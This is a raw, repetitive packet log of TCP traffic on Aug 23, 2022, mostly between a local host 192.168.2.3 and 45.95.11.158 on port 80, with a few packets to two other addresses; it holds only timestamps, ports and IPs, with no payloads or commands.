Aug 23, 2022 18:24:02.748436928 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.748451948 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.749106884 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.749146938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.749175072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.749188900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.749203920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.749217987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.749222994 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.749232054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.749250889 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.749279022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.749293089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.749336958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.750606060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.750648022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.750675917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.750699043 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.750725031 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.751105070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.756891012 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.756925106 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.756948948 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.756969929 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.756990910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.757044077 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.757366896 CEST	49836	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:24:02.757388115 CEST	443	49836	149.154.167.99	192.168.2.3
Aug 23, 2022 18:24:02.759022951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759090900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759104013 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759130955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759150982 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759151936 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759176970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759177923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759196043 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759202003 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759217978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759247065 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759280920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759306908 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759327888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759342909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759495020 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759527922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759552002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759562016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759577990 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759602070 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759628057 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759676933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759685993 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759726048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759778976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759814024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759829044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759836912 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759855032 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759862900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759880066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759907961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759916067 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759939909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.759970903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.759983063 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.760432005 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.760464907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.760499954 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.760523081 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.760540009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.760564089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.760587931 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.760607958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.760612011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.760637045 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.760637999 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.760663033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.760687113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.760699034 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.760704994 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.760710001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.760732889 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.760735989 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.760755062 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.760760069 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.760782957 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.760802984 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.760979891 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761006117 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761029959 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761049986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.761053085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761055946 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.761076927 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761087894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.761099100 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761116028 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.761120081 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.761122942 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761154890 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.761166096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761172056 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.761204958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761210918 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.761245012 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761251926 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.761293888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.761312962 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761337996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761359930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761359930 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.761383057 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761383057 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.761405945 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.761405945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761429071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.761434078 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.761451960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.761473894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.764951944 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:02.781969070 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782068014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782139063 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782174110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782197952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782259941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782267094 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782293081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782315016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782321930 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782340050 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782341003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782361031 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782365084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782388926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782397032 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782412052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782437086 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782445908 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782450914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782454014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782460928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782484055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782495022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782530069 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782555103 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782560110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782587051 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782608986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782613039 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782625914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782638073 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782663107 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782665968 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782686949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782732010 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782769918 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782824039 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782846928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.782871008 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782886982 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.782987118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.783030987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.783039093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.783071995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.784347057 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.784374952 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.784399986 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.784421921 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.784447908 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.784667969 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.784706116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.784729958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.784730911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.784740925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.784754992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.784769058 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.785705090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.791224957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.791302919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.791310072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.791327953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.791342020 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.791367054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.791377068 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.791409969 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.792814016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.792845011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.792870045 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.792870998 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.792895079 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.792916059 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.792926073 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.792970896 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.793296099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.793320894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.793344975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.793350935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.793369055 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.793380022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.793411016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.793436050 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.793452024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.793459892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.793473959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.793498039 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.793898106 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.793924093 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.793950081 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.793962955 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.793984890 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794011116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794027090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.794047117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.794320107 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794346094 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794369936 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794373989 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.794392109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.794394016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794403076 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.794429064 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.794683933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794708014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794723988 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.794740915 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.794764996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794802904 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.794806004 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794830084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794842005 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.794853926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794866085 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.794878006 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794892073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.794902086 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794912100 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.794925928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794934988 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.794949055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.794959068 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.794981956 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795016050 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795041084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795051098 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795073986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795213938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795237064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795262098 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795285940 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795335054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795377970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795383930 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795403004 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795413017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795428038 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795440912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795452118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795471907 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795475960 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795500994 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795521975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795522928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795567989 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795578003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795597076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795638084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795641899 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795663118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795677900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795689106 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795701981 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795712948 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795726061 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795736074 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795761108 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795764923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795783043 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795785904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795799971 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795839071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795846939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795861006 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.795877934 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.795898914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.804430008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.804490089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.804514885 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.804543972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.804554939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.804579020 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.804611921 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.810653925 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:02.810924053 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:02.813683033 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:02.824084044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.824156046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.824179888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.824182034 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.824209929 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.824482918 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.824683905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.824744940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.824779987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.824806929 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.825165033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.825197935 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.825258970 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.826297045 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826325893 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826354027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826364994 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.826380968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826391935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.826407909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826433897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826442957 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.826457024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.826519012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.826551914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826581955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826606989 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.826608896 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826636076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826639891 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.826662064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826662064 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.826680899 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.826704025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.826803923 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826831102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.826859951 CEST	49827	80	192.168.2.3	45.95.11.158
